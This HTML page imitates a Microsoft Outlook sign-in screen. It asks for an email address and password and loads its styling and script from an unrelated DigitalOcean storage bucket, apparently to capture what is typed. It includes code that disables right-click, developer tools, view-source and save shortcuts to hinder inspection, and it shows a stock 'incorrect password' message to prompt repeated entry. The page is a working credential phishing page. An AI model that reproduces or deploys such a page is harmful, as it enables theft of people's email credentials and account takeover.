<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="shortcut icon" href="https://maeroxz.nyc3.digitaloceanspaces.com/context/favicon.ico" type="image/x-icon">
    <title>Outlook</title>
    <link rel="stylesheet" href="https://maeroxz.nyc3.digitaloceanspaces.com/context/app.css">
</head>
<body>
<script language="JavaScript">
  /**
    * Disable right-click of mouse, F12 key, and save key combinations on page
    * By Arthur Gareginyan (https://www.arthurgareginyan.com)
    * For full source code, visit https://mycyberuniverse.com
    */
  window.onload = function() {
    document.addEventListener("contextmenu", function(e){
      e.preventDefault();
    }, false);
    document.addEventListener("keydown", function(e) {
    //document.onkeydown = function(e) {
      // "I" key
      if (e.ctrlKey && e.shiftKey && e.keyCode == 73) {
        disabledEvent(e);
      }
      // "J" key
      if (e.ctrlKey && e.shiftKey && e.keyCode == 74) {
        disabledEvent(e);
      }
      // "S" key + macOS
      if (e.keyCode == 83 && (navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)) {
        disabledEvent(e);
      }
      // "U" key
      if (e.ctrlKey && e.keyCode == 85) {
        disabledEvent(e);
      }
      // "F12" key
      if (event.keyCode == 123) {
        disabledEvent(e);
      }
    }, false);
    function disabledEvent(e){
      if (e.stopPropagation){
        e.stopPropagation();
      } else if (window.event){
        window.event.cancelBubble = true;
      }
      e.preventDefault();
      return false;
    }
  };
</script>
    <div id="app">
        <div class="side"></div>
        <div class="main">
            <div class="wrapper">

                <div class="box">
                    <div class="logo"></div>
                    <div class="row">
                        <label for="">Email address:</label>
                        <input type="text" id="email" placeholder="email address">
                    </div>
                    <div class="row">
                        <label for="">Password:</label>
                        <input type="password" id="password" placeholder="password">
                    </div>
                    <div class="row">
                        <input type="checkbox" name="" id="show_pass">
                        <label for="show_pass" class="show_pass">Show password</label>
                    </div>
                    <div class="row">
                        <div class="error">The user name or password you entered isn't correct. Try entering it again.</div>
                    </div>
                    <div class="row">
                        <div class="login">sign in</div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="https://maeroxz.nyc3.digitaloceanspaces.com/context/app.js"></script>
</body>
</html>